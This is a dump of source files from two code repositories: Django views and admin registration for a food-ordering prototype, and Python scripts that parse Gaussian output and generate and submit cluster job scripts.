Response({\"message\": \"sin sucursales\"})\n\n\n\n\n@api_view()\ndef getMenu(request):\n\ttry:\n\t\tsucursal_id = (request.GET['id_sucursal'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_sucursal is required\"})\n\n\ttry:\n\t\tsucursal = Sucursal.objects.get(Q(id_sucursal=sucursal_id))\n\texcept Exception, e:\n\t\tsucursal = \"\"\n\n\tif sucursal != \"\":\n\n\t\tmenus = Menu.objects.filter(Q(id_sucursal=sucursal))\n\n\t\tif menu:\n\n\t\t\tlista_menu = []\n\n\t\t\tfor menu in menus:\n\t\t\t\tlista_menu.append({'id_sucursal':menu.id_sucursal,'descripcion':menu.descripcion,'tipo_comida':menu.tipo_comida,'precio':menu.precio,'photo_menu':menu.photo_menu,})\n\n\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_menu))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('sin menu')\n\t\t\treturn Response({\"message\": \"no data in Menu\"})\n\telse:\n\t\tprint('sin menu')\n\t\treturn Response({\"message\": \"sin sucursal\"})\n\n\n\n\n\n@api_view()\ndef getSucursalInfo(request):\n\n\ttry:\n\t\tsucursal_id = (request.GET['id_sucursal'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_sucursal is required\"})\n\n\ttry:\n\t\tsucursal = Sucursal.objects.get(Q(id_sucursal=sucursal_id))\n\texcept Exception, e:\n\t\tsucursal = \"\"\n\n\tif sucursal:\n\n\t\tlista_sucursal = []\n\n\t\t\n\t\tlista_sucursal.append({'name':str(sucursal.name),'phone':str(sucursal.phone),'addres':str(sucursal.addres),})\n\n\t\ttry:\n\t\t\treturn Response(json.dumps(lista_sucursal))\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\telse:\n\n\n\t\treturn Response({\"message\": \"sin sucursal\"})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7257525324821472,
"alphanum_fraction": 0.7257525324821472,
"avg_line_length": 13.2380952835083,
"blob_id": "232114b954b99443e0fa7949b9dc9e19a85f02af",
"content_id": "c149102bb0e800d7c5bb48f7efefd02611af7379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 598,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 42,
"path": "/README.md",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# Gourmory\n\n\nPrototype Web to Sell and Track Food\n\n## Getting Started\n\nThese instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.\n\n### Installing\n\n\nInstall all dependencies on the requirement.txt file\n\n\n```\npip install -r requirement.txt\n```\n\nand install Redis \n\n```\nhttps://redis.io/topics/quickstart\n```\n\n## Running the tests\n\nFirst run redis\n\n```\nredis-server\n```\n\nthen run project Django \n\n```\npython manage.py runserver\n```\n\n\n## Authors\n* **Sheymen** "
},
{
"alpha_fraction": 0.7307570576667786,
"alphanum_fraction": 0.731073796749115,
"avg_line_length": 28.157407760620117,
"blob_id": "f7a06902b1b5a92a536692ef9d3bda55685ae891",
"content_id": "b1d005efa8e31489d9299a1af971691b8e550885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3157,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 108,
"path": "/API/admin.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.contrib import admin\n\n# Register your models here.\n\nfrom models import *\n\nclass User_infoAdmin(admin.ModelAdmin):\n\tlist_display = ('user','name','userName','email','phone','profile_picture','last_connection','reputacion',)\n\t#list_filter = ('user','username')\n\tsearch_fields = ('userName',)\n\n\nclass Menu_Admin(admin.ModelAdmin):\n\tlist_display = ('id_menu','id_sucursal','descripcion','tipo_comida','precio','photo_menu',)\n\tsearch_fields = ('precio',)\n\n\nclass Pedido_Admin(admin.ModelAdmin):\n\tlist_display = ('id_pedido','id_userInfo','id_direccion','Precio_total','Date','hour','id_statusOrden',)\n\tsearch_fields = ('Precio_total',)\n\n\nclass Vendedor_Admin(admin.ModelAdmin):\n\tlist_display = ('id_vendedor','id_user_info','status',)\n\tsearch_fields = ('status',)\n\n\nclass Direccion_Admin(admin.ModelAdmin):\n\tlist_display = ('id_direccion','direccion',)\n\tsearch_fields = ('direccion',)\n\n\nclass Listapedido_Admin(admin.ModelAdmin):\n\tlist_display = ('id_listapedido','id_menu','id_pedido','cantidad',)\n\tsearch_fields = ('cantidad',)\n\n\n\nclass Sucursal_Admin(admin.ModelAdmin):\n\tlist_display = ('id_sucursal','name','phone','addres',)\n\tsearch_fields = ('name',)\n\n\n\nclass Status_orden_Admin(admin.ModelAdmin):\n\tlist_display = ('id_statusOrden','descripcion',)\n\tsearch_fields = ('descripcion',)\n\n\n\nclass Lista_direcciones_ip_Admin(admin.ModelAdmin):\n\tlist_display = ('id_lista_direcciones_ip','id_ip_records','direccion_ip','fecha_usro',)\n\tsearch_fields = ('fecha_usro',)\n\n\nclass Payment_user_info_Admin(admin.ModelAdmin):\n\tlist_display = ('id_payment_user_info','id_user_info','current_payment','saldo',)\n\tsearch_fields = ('saldo',)\n\n\n\nclass Gustos_Admin(admin.ModelAdmin):\n\tlist_display = ('id_gustos','descripcion','categoria',)\n\tsearch_fields = ('categoria',)\n\n\nclass Ip_records_Admin(admin.ModelAdmin):\n\tlist_display = ('id_ip_records','id_user_info','ip_actual',)\n\tsearch_fields = ('ip_actual',)\n\n\nclass Lista_gustos_Admin(admin.ModelAdmin):\n\tlist_display = ('id_lista_gustos','id_userInfo','id_gustos',)\n\t\n\nclass Payment_Available_Admin(admin.ModelAdmin):\n\tlist_display = ('id_payment_Available','id_payment_userinfo','type',)\n\tsearch_fields = ('type',)\n\n\n\nclass Vendedor_favorito_Admin(admin.ModelAdmin):\n\tlist_display = ('id_vendedor_favorito','id_user_info','fecha_agregado','id_vendedor','calificacion',)\n\tsearch_fields = ('calificacion',)\n\n\n\n\n\n\n\n\nadmin.site.register(User_info,User_infoAdmin)\nadmin.site.register(Menu,Menu_Admin)\nadmin.site.register(Pedido,Pedido_Admin)\nadmin.site.register(Vendedor,Vendedor_Admin)\nadmin.site.register(Direccion,Direccion_Admin)\nadmin.site.register(Listapedido,Listapedido_Admin)\nadmin.site.register(Sucursal,Sucursal_Admin)\nadmin.site.register(Status_orden,Status_orden_Admin)\nadmin.site.register(Lista_direcciones_ip,Lista_direcciones_ip_Admin)\nadmin.site.register(Payment_user_info,Payment_user_info_Admin)\nadmin.site.register(Gustos,Gustos_Admin)\nadmin.site.register(Ip_records,Ip_records_Admin)\nadmin.site.register(Lista_gustos,Lista_gustos_Admin)\nadmin.site.register(Payment_Available,Payment_Available_Admin)\nadmin.site.register(Vendedor_favorito,Vendedor_favorito_Admin)\n\n\n\n\n\n\n\n\n"
}
] | 7 |
theavey/QM-calc-scripts | https://github.com/theavey/QM-calc-scripts | 76219c6685ef6140e024ab7c227feeef2105f5e4 | 60b06e14b2efd307d419201079bb24152ab0bd3c | c11672eb61807b46b7c0e2c030a77bc928a1733e | refs/heads/master | 2021-06-26T03:46:42.159370 | 2019-05-01T18:41:07 | 2019-05-01T18:41:07 | 35,679,810 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.46087247133255005,
"alphanum_fraction": 0.465134859085083,
"avg_line_length": 49.8983039855957,
"blob_id": "f5012241777591938dae038ca5dcbc643bbcb13d",
"content_id": "8204c309e3076b165a901970531e97d689bf5de7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15015,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 295,
"path": "/gautools/out_to_list.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\n########################################################################\n# #\n# #\n# #\n# Known issues: #\n# Methods which are declared with non-alphanumeric characters #\n# #\n# #\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015, 2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n\nimport argparse # For parsing commandline arguments\nimport glob # Allows referencing file system/file names\nimport re # RegEx package for sorting data\n\nfrom . import geomRegex\n\n\ndef outtolist(base_name: str, method: str,\n singlefile: bool = False, geometries: int = 0,\n interactive: bool = False):\n \"\"\"This function reads command line arguments (use -h for help)\n to take output from quantum chemistry calculations and put useful\n data such as energy and geometries into (a) separate file(s).\"\"\"\n\n in_name_list = glob.glob(base_name + '*out')\n num_files = len(in_name_list)\n\n in_name_list.sort() # sort files alphanumerically\n in_name_list.sort(key=len) # sort by length (because otherwise would\n # out 1,10,11,... as opposed to 1,...,9,10,...\n # if number 01,02,... They should all be the same length and the\n # second sort won't do anything.\n\n yes = ['y', 'yes', '1']\n # process in case of single file\n if singlefile:\n if num_files == 0:\n in_name_list = glob.glob(base_name)\n num_files = len(in_name_list)\n print('number of files is {}'.format(num_files))\n if num_files == 1:\n in_name = in_name_list[0]\n print('(single) file name is {}'.format(in_name))\n if num_files > 1:\n print('More than one file matched input file name.')\n if (interactive and\n input('Get energies from multiple output files?') in yes):\n singlefile = False\n else:\n raise SyntaxError('Okay, well files that matched your input '\n 'are {}'.format(in_name_list))\n # Print some stuff if not a single file. Note, not \"else\" because\n # I might set singlefile to false above.\n if not singlefile:\n print('base file name is {}'.format(base_name))\n print('number of files is {:,}'.format(num_files))\n # todo add energies to comment line of geoms file\n # will be difficult/require changes, but would be good, I think\n if geometries == 1:\n # todo Need to figure this out obvs!!!!!!\n raise NotImplementedError('Not able to pull out single geom yet.')\n # Collect all geometries from files for -gg (or more)\n if geometries > 1:\n geoms_out_name = base_name + '_allgeoms'\n with open(geoms_out_name, 'w') as geom_file:\n if singlefile:\n geoms = geomRegex.findallgeoms(in_name)\n for geom in geoms:\n num_atoms = len(geom)\n geom_file.write(str(num_atoms) + '\\n')\n geom_file.write('geometry from {}\\n'.format(base_name))\n for atom in geom:\n geom_file.write(atom + '\\n')\n else:\n for file_name in in_name_list:\n geoms = geomRegex.findallgeoms(file_name)\n for geom in geoms:\n num_atoms = len(geom)\n geom_file.write(str(num_atoms) + '\\n')\n geom_file.write('geometry from {}\\n'.format(base_name))\n for atom in geom:\n geom_file.write(atom + '\\n')\n\n out_name = base_name + '_energies'\n\n # Define methods I might use that change how to process file.\n methods = {'wb97xd': 'dft', 'mp2': 'mp2', 'pbe50': 'sfdft',\n 'eom-ccsd': 'sf', 'hf': 'hf', 'pbe1pbe': 'gdft',\n 'cis': 'gcis'}\n # reading more about regex, I really should use them. I could\n # define how it matches based on the method, as opposed to all\n # the If Then loops I currently have.\n # I could essentially have a dictionary of regular expressions and just\n # reference the appropriate one for the type of output it's reading.\n # Alternatively, I could just break it up into a lot of subroutines\n # that could be called depending on the type of output.\n\n i = 0\n # Initialize not knowing method used\n _method = None\n # If given as commandline argument, set with the given method\n if method is not None:\n try:\n _method = methods[method.lower()]\n except KeyError:\n print('method {} unrecognized. Going to '.format(method) +\n 'try to find method based on output file.')\n\n # Gaussian method regex:\n # finds non-whitespace characters before a / and after a\n # whitespace character. Requires that the input be in the form\n # (method)/(something, normally basis set).\n gregex = re.compile(r'\\s+\\S+/')\n # QChem SF methods energy regex:\n sfenergy = re.compile(r'[=:]\\s*-\\d*\\.\\d*')\n # Gaussian DFT methods ground state energy regex:\n # (could use sfenergy, or combine into one)\n gdftenergy = re.compile(r'=\\s*-\\d*\\.\\d*')\n # Gaussian TD-DFT methods excited state energies regex:\n tdgdftenergy = re.compile(r'\\s-*\\d+\\.\\d+\\s+ev')\n # Gaussian CIS ground state energy regex:\n # Goes to end of the line because given in scientific notation.\n gcisenergy = re.compile(r'eump2\\s*=\\s*-.+')\n # todo write geometry regex\n # todo find some way to find \"stationary point\" and process as needed\n\n # todo add geometry getting to all this multifile stuff\n with open(out_name, 'w') as out_file:\n for name in in_name_list:\n energy_list = []\n with open(name, 'r') as in_file:\n for line in in_file:\n line = line.lower().strip()\n if _method is None:\n if 'method' in line or 'exchange' in line:\n # make the line into a list split by spaces\n linelist = re.split(' +', line)\n # could maybe shorten these next lines with\n # a Try Except construction\n if linelist[-1] in methods:\n _method = methods[linelist[-1]]\n else:\n print('Unknown method {} used'.format(\n linelist[-1]))\n print('Assuming output formatted as HF')\n _method = 'hf'\n if 'entering gaussian sys' in line:\n _method = 'gaugen'\n # Gaussian output file, method undetermined\n continue\n if _method is 'gaugen':\n if line.startswith('#'):\n gmethodmatch = gregex.search(line)\n # todo do this with only one regex using groups\n # and non-capturing groups\n if gmethodmatch:\n gmethod = re.search(r'\\w+',\n gmethodmatch.group())\n if gmethod:\n try:\n _method = methods[gmethod.group()]\n except KeyError:\n print('unknown Gaussian method. ' +\n 'Assuming (g)dft.')\n _method = 'gdft'\n if re.search(r'\\btd\\s*[(=]', line):\n _method = 'td' + _method\n # Note, this will cause problems if TD is\n # declared on a line before the\n # functional/method.\n continue\n if _method is 'dft':\n if line.startswith('total energy'):\n # make the line into a list split by spaces\n linelist = re.split(' +', line)\n out_file.write(linelist[-1])\n out_file.write('\\n')\n continue\n if _method is 'mp2':\n if 'total energy' in line:\n # make the line into a list split by spaces\n linelist = re.split(' +', line)\n out_file.write(linelist[-2])\n out_file.write('\\n')\n continue\n if _method is 'sf':\n if 'otal energy' in line:\n if 'basis set' in line:\n # Ignore HF energy\n continue\n # use RegEx to find energy in the line:\n match = sfenergy.search(line)\n energy_list.append(match.group()[2:])\n continue\n if _method is 'sfdft':\n if 'otal energy' in line:\n # use RegEx to find energy in the line:\n match = sfenergy.search(line)\n energy_list.append(match.group()[2:])\n continue\n if _method.endswith('gdft'):\n # Ground state energy search for (TD)DFT with Gauss\n if 'scf done' in line:\n match = gdftenergy.search(line)\n energy_list.append(match.group()[2:])\n continue\n # Note on this line below: because I don't set the\n # method name for TD methods in one step, the \"is\"\n # comparison here will fail, because they point at\n # different places, but the (slower) equality\n # comparison will work because it will go through\n # and actually compare each character.\n if _method == 'tdgdft':\n if line.startswith('excited state'):\n match = tdgdftenergy.search(line)\n if match:\n energy_list.append(match.group()[:-3])\n continue\n if _method is 'gcis':\n if 'eump2' in line:\n match = gcisenergy.search(line)\n energy_list.append(match.group()[8:])\n continue\n if line.startswith('excited state'):\n match = tdgdftenergy.search(line)\n if match:\n energy_list.append(match.group()[:-3])\n continue\n # if energy_list:\n # Only true if not empty\n if True:\n # Using for now because some error blank files\n # should still produce a line in the output, even if blank\n out_file.write(str(energy_list) + '\\n')\n i += 1\n # todo save files with desired information\n\n print(\"Opened {0} files, and wrote data to {1}\".format(i, out_name))\n print('Files processed for {} method.'.format(_method))\n try:\n # will only work if geoms_out_name defined above\n print('geometries written to {}'.format(geoms_out_name))\n except NameError:\n print('No geometries saved')\n # todo write statements about files that were saved\n\n\nif __name__ == \"__main__\":\n descrip = ('This function takes a base file name for output files and makes'\n ' a file basename_energies that is a list of the energies from '\n 'the the read output files.')\n\n parser = argparse.ArgumentParser(description=descrip)\n parser.add_argument('base_name', help='base name of files to read')\n # todo use argparse to check for multiple positional arguments?\n # If I pass it as list set it all as in_name_list?\n parser.add_argument('-m', '--method',\n help=('calculation method (changes how files '\n 'are interpreted)'))\n parser.add_argument('-s', '--singlefile', action='store_true',\n help=('use if output is single file with '\n 'multiple geometries'))\n parser.add_argument('-g', '--geometries', action='count', default=0,\n help=('Flag for creating file of geometries in '\n 'XYZ style format.'\n '\\n-g for stationary points, -gg for all.'))\n # todo add option for saving all energies -e?\n # todo add flag for gaussian vs. qchem?\n # maybe to separate file with different name? Probably not\n args = parser.parse_args()\n outtolist(base_name=args.basename, method=args.method,\n singlefile=args.singlefile, geometries=args.geometries,\n interactive=True)\n"
},
{
"alpha_fraction": 0.5301768779754639,
"alphanum_fraction": 0.535067617893219,
"avg_line_length": 43.49074172973633,
"blob_id": "0be7c7870f23a10b36fb7417d0934c5beb6e96b6",
"content_id": "16adc3c8486e2f9e557cbef70e8a437e66aeb740",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19220,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 432,
"path": "/gautools/submit_gaussian.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2015. #\n# [email protected] [email protected] #\n# #\n# Copyright 2015 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\n# This is written to work with python 3 because it should be good to\n# be working on the newest version of python.\nfrom __future__ import print_function\n\nimport argparse # For parsing commandline arguments\nimport datetime\nimport glob # Allows referencing file system/file names\nimport os\nimport re\nimport readline # Allows easier file input (with tab completion?)\nimport subprocess # Allows for submitting commands to the shell\nfrom warnings import warn\nfrom thtools import cd, make_obj_dir, save_obj, resolve_path\n\nyes = ['y', 'yes', '1']\n\n\n# An input function that can prefill in the text entry\n# Not sure if this works in 3.5+ because raw_input is gone\ndef rlinput(prompt, prefill=''):\n readline.set_startup_hook(lambda: readline.insert_text(prefill))\n try:\n return input(prompt)\n finally:\n readline.set_startup_hook()\n\n\ndef _dir_and_file(path):\n warn('_dir_and_file is deprecated. Use os.path.split instead',\n DeprecationWarning)\n if '/' in path:\n rel_dir, f_name = path.rsplit('/', 1)\n rel_dir = rel_dir + '/'\n else:\n rel_dir = ''\n f_name = path\n return rel_dir, f_name\n\n\ndef create_gau_input(coord_name, template, verbose=True):\n \"\"\"\n make gaussian input file by combining header and coordinates files\n\n This function takes as input a file with a set of molecular\n coordinates (the form should not matter, it will just be copied\n into the next file) and a template file that should be the header\n for the desired calculation (including charge and multiplicity),\n returns the name of the file, and creates a Gaussian input file ending\n with '.com'\n\n :param str coord_name: name of file with coordinates in a format\n Gaussian can read\n :param str template: name of file with header for Gaussian calculation\n (up to and including the charge and multiplicity)\n :param bool verbose: If True, some status messages will be printed\n (including file names)\n :return: name of the written file\n :rtype: str\n \"\"\"\n if verbose:\n print('Creating Gaussian input file...')\n _out_name = coord_name.rsplit('.', 1)[0] + '.com'\n with open(_out_name, 'w') as out_file:\n with open(template, 'r') as templ_file:\n if verbose:\n print('opened {}'.format(template))\n for line in templ_file:\n out_file.write(line)\n if '\\n' not in line:\n out_file.write('\\n')\n with open(coord_name, 'r') as in_file:\n if verbose:\n print('opened {}'.format(coord_name))\n for i, line in enumerate(in_file):\n if i < 2:\n # ignore first two lines\n # number of atoms and the title/comment\n continue\n # if line.strip().isdigit():\n # # the first line is the number of atoms\n # continue\n # # XYZ files created by mathematica have a comment\n # # as the second line saying something like:\n # # \"Created by mathematica\". Obv. want to ignore that\n # if line.strip().startswith('Create') or\n # line.strip().startswith('generated'):\n # continue\n # else:\n out_file.write(line)\n out_file.write('\\n\\n\\n')\n if verbose:\n print('created Gaussian input file {}'.format(_out_name))\n return _out_name\n\n\ndef get_input_files(base_name, batch):\n _in_name_list = glob.glob(base_name + '*')\n _in_name_list.sort() # sort files alphanumerically\n _in_name_list.sort(key=len) # sort by length (because otherwise would\n # put 1,10,11,... as opposed to 1,...,9,10,...\n # if number 01,02,... They should all be the same length and the\n # second sort won't do anything.\n if not batch:\n num_files = len(_in_name_list)\n if num_files > 1:\n print('Multiple files starting with {}'.format(base_name))\n if input('Did you mean to execute a batch job? ') in yes:\n batch = True\n else:\n print('What file name shall I use?')\n _in_name_list = [rlinput('file name: ', base_name)]\n return _in_name_list, batch\n\n\ndef use_template(template, in_names, verbose):\n made_name_list = []\n for in_name in in_names:\n out_name = create_gau_input(in_name, template, verbose=verbose)\n made_name_list.append(out_name)\n if verbose:\n print('Added {} to files to possibly submit.'.format(out_name))\n _in_name_list = made_name_list\n _in_name_list.sort()\n _in_name_list.sort(key=len)\n return _in_name_list\n\n\ndef write_sub_script(input_name, num_cores=16, time='12:00:00', verbose=False,\n mem='125', executable='g09',\n chk_file=None, copy_chk=False,\n ln_running=None,\n hold_jid=None, xyz=None, make_xyz=None, make_input=False,\n ugt_dict=None):\n \"\"\"\n Write submission script for (Gaussian) jobs for submission to queue\n\n If make_xyz is not None, the file make_xyz will be checked to exist\n first to make sure to not waste time when missing a necessary input file.\n\n :param str input_name: Name of the file to use as input\n :param int num_cores: Number of cores to request\n :param str time: Amount of time to request in the format 'hh:mm:ss'\n :param bool verbose: If True, print out some status messages and such\n :type mem: int or str\n :param mem: Minimum amount of memory to request\n :param str executable: Executable file to use for the job\n\n Example, 'g09', 'g16'\n\n :param str chk_file: If not None, this file will be copied back after the\n job has completed. If this is not None and make_input is True,\n this will also be passed to use_gen_template.\n :param bool copy_chk: If this is True, the script will attempt to copy\n what should be an existing checkpoint file to the scratch directory\n before running the job. `chk_file` must be not None as well.\n :param str ln_running: If not None, this will be the base name for\n linking the output file to the current directory. If chk_file is not\n None, it will also be linked with the same base name.\n :param str hold_jid: Job on which this job should depend.\n This should be the name of another job in the queuing system.\n :param str xyz: Name of an xyz file to use as input to use_gen_template\n (if make_input is True).\n :param str make_xyz: The name of a file to pass to obabel to be used to\n create an xyz file to pass to use_gen_template.\n :param bool make_input: If True, use_gen_template will be used to create\n input for the Gaussian calculation.\n :param dict ugt_dict: dict of arguments to pass to use_gen_template.\n\n This should not include out_file, xyz, nproc, mem, or checkpoint\n because those will all be used from other arguments to this function.\n out_file will be input_name; xyz will be xyz or a time-based name if\n make_xyz is not None; nproc will be $NSLOTS (useful if this gets\n changed after job submission); mem will be mem; and checkpoint will\n be chk_file.\n :return: The name of the script file\n :rtype: str\n \"\"\"\n rel_dir, file_name = os.path.split(input_name)\n if file_name.endswith('.com'):\n short_name = os.path.splitext(file_name)[0]\n if not short_name + '.com' == file_name:\n raise SyntaxError('problem interpreting file name. ' +\n 'Period in file name?')\n out_name = short_name + '.out'\n elif '.' in file_name:\n short_name, input_extension = os.path.splitext(file_name)\n if not short_name + '.' + input_extension == file_name:\n raise SyntaxError('problem interpreting file name. ' +\n 'Period in file name?')\n out_name = short_name + '.out'\n else:\n short_name = file_name\n file_name = short_name + '.com'\n print('Assuming input file is {}'.format(file_name))\n out_name = short_name + '.out'\n job_name = re.match(r'.*?([a-zA-Z].*)', short_name).group(1)\n if len(job_name) == 0:\n job_name = 'default'\n _script_name = os.path.join(rel_dir, 'submit'+short_name+'.sh')\n temp_xyz = os.path.abspath('.temp' +\n datetime.datetime.now().strftime('%H%M%S%f') +\n '.xyz')\n if xyz is None or make_xyz is not None:\n n_xyz = temp_xyz\n else:\n n_xyz = resolve_path(xyz)\n temp_pkl = temp_xyz[:-4]\n if ugt_dict is not None:\n make_obj_dir()\n pkl_path = save_obj(ugt_dict, temp_pkl)\n if chk_file is not None:\n chk_line = 'checkpoint=\\'{}\\','.format(chk_file)\n else:\n chk_line = ''\n\n with open(_script_name, 'w') as script_file:\n sfw = script_file.write\n sfw('#!/bin/bash -l\\n\\n')\n sfw('#$ -pe omp {}\\n'.format(num_cores))\n sfw('#$ -M [email protected]\\n')\n sfw('#$ -m eas\\n')\n sfw('#$ -l h_rt={}\\n'.format(time))\n sfw('#$ -l mem_total={}G\\n'.format(mem))\n sfw('#$ -N {}\\n'.format(job_name))\n sfw('#$ -j y\\n')\n sfw('#$ -o {}.log\\n\\n'.format(short_name))\n if hold_jid is not None:\n sfw('#$ -hold_jid {}\\n\\n'.format(hold_jid))\n if make_xyz is not None:\n sfw('if [ ! -f {} ]; then\\n'.format(\n os.path.abspath(make_xyz)) +\n ' exit 17\\n'\n 'fi\\n\\n')\n sfw('module load wxwidgets/3.0.2\\n')\n sfw('module load openbabel/2.4.1\\n\\n')\n sfw('obabel {} -O {}\\n\\n'.format(os.path.abspath(\n make_xyz), os.path.abspath(n_xyz)))\n if make_input:\n sfw('python -c \"from gautools.tools import '\n 'use_gen_template as ugt;\\n'\n 'from thtools import load_obj, get_node_mem;\\n'\n 'm = get_node_mem();\\n'\n 'd = load_obj(\\'{}\\');\\n'.format(\n os.path.abspath(pkl_path)) +\n 'ugt(\\'{}\\',\\'{}\\','.format(\n file_name, os.path.abspath(n_xyz)) +\n 'nproc=$NSLOTS,mem=m,{}'.format(chk_line) +\n '**d)\"\\n\\n')\n sfw('INPUTFILE={}\\n'.format(file_name))\n sfw('OUTPUTFILE={}\\n'.format(out_name))\n if chk_file is not None:\n sfw('CHECKFILE={}\\n\\n'.format(chk_file))\n else:\n sfw('\\n')\n if ln_running is not None:\n sfw('WORKINGOUT={}.out\\n'.format(ln_running))\n if chk_file is not None:\n sfw('WORKINGCHK={}.chk\\n\\n'.format(ln_running))\n else:\n sfw('\\n')\n sfw('CURRENTDIR=`pwd`\\n')\n sfw('SCRATCHDIR=/scratch/$USER\\n')\n sfw('mkdir -p $SCRATCHDIR\\n\\n')\n sfw('cd $SCRATCHDIR\\n\\n')\n sfw('cp $CURRENTDIR/$INPUTFILE .\\n')\n if chk_file is not None:\n sfw('# ') if not copy_chk else None\n sfw('cp $CURRENTDIR/$CHECKFILE .\\n\\n')\n else:\n sfw('\\n')\n if ln_running is not None:\n sfw('ln -s -b /net/`hostname -s`$PWD/$OUTPUTFILE '\n '$CURRENTDIR/$WORKINGOUT\\n')\n if chk_file is not None:\n sfw('ln -s -b /net/`hostname -s`$PWD/$CHECKFILE '\n '$CURRENTDIR/$WORKINGCHK\\n\\n')\n else:\n sfw('\\n')\n sfw('echo About to run {} in /net/`'.format(executable) +\n 'hostname -s`$SCRATCHDIR\\n\\n')\n sfw('{} <$INPUTFILE > $OUTPUTFILE'.format(executable))\n sfw('\\n\\n')\n if ln_running is not None:\n sfw('rm $CURRENTDIR/$WORKINGOUT')\n if chk_file is not None:\n sfw(' $CURRENTDIR/$WORKINGCHK\\n\\n')\n else:\n sfw('\\n\\n')\n sfw('cp $OUTPUTFILE $CURRENTDIR/.\\n')\n if chk_file is not None:\n sfw('cp $CHECKFILE $CURRENTDIR/.\\n\\n')\n else:\n sfw('\\n')\n sfw('echo ran in /net/`hostname -s`$SCRATCHDIR\\n')\n sfw('echo output was copied to $CURRENTDIR\\n\\n')\n\n if verbose:\n print('script written to {}'.format(_script_name))\n return _script_name\n\n\ndef submit_scripts(scripts, batch=False, submit=False, verbose=False):\n outputs = []\n if batch:\n if submit or input('submit all jobs? ') in yes:\n for script in scripts:\n rd, f = _dir_and_file(script)\n with cd(rd, ignore_blank=True):\n cl = ['qsub', f]\n # Don't really know how this works. Copied from\n # http://stackoverflow.com/questions/4256107/\n # running-bash-commands-in-python\n process = subprocess.Popen(cl,\n stdout=subprocess.PIPE,\n universal_newlines=True)\n output = process.communicate()[0]\n if verbose:\n print(output)\n outputs.append(output)\n else:\n if verbose:\n print('No jobs submitted, but scripts created')\n else:\n if submit or input('submit job {}? '.format(scripts[0])) in yes:\n rd, f = _dir_and_file(scripts[0])\n with cd(rd, ignore_blank=True):\n cl = ['qsub', f]\n # Don't really know how this works. Copied from\n # http://stackoverflow.com/questions/4256107/\n # running-bash-commands-in-python\n process = subprocess.Popen(cl,\n stdout=subprocess.PIPE,\n universal_newlines=True)\n output = process.communicate()[0]\n if verbose:\n print(output)\n outputs.append(output)\n else:\n if verbose:\n print('{} not submitted'.format(scripts))\n _job_info = [' '.join(output.split(' ')[2:4]) for output in outputs]\n return _job_info\n\n\nif __name__ == '__main__':\n description = 'Create and submit a script to run a Gaussian job on SCC'\n\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('in_name',\n help='Name of Gaussian input file')\n parser.add_argument('-c', '--numcores', type=int, default=16,\n help='Number of cores for job')\n # I should probably check validity of this time request\n # Maybe it doesn't matter so much because it just won't\n # submit the job and it will give quick feedback about that?\n parser.add_argument('-t', '--time',\n help='Time required as \"hh:mm:ss\"',\n default='12:00:00')\n parser.add_argument('-e', '--executable', type=str, default='g09',\n help='name of executable to run')\n parser.add_argument('-b', '--batch', action='store_true',\n help='create multiple scripts (batch job)')\n parser.add_argument('-x', '--template', default=None,\n help='template file for creating input from coords')\n parser.add_argument('-s', '--submit', action='store_true',\n help='Automatically submit jobs?')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='make program more verbose')\n parser.add_argument('-j', '--nojobinfo', action='store_false',\n help='Do not return the submitted job information')\n parser.add_argument('-k', '--chk_file', default=None,\n help='checkpoint file to be written and copied back')\n parser.add_argument('--copy_chk', action='store_true',\n help='Copy check file to the scratch directory')\n parser.add_argument('-l', '--ln_running', type=str, default=None,\n help='base name for linking output to cwd while '\n 'running')\n parser.add_argument('-d', '--hold_jid', default=None,\n help='job on which this job should depend')\n args = parser.parse_args()\n\n in_name_list, args.batch = get_input_files(args.in_name, args.batch)\n if args.template:\n in_name_list = use_template(args.template, in_name_list, args.verbose)\n script_list = []\n for in_name in 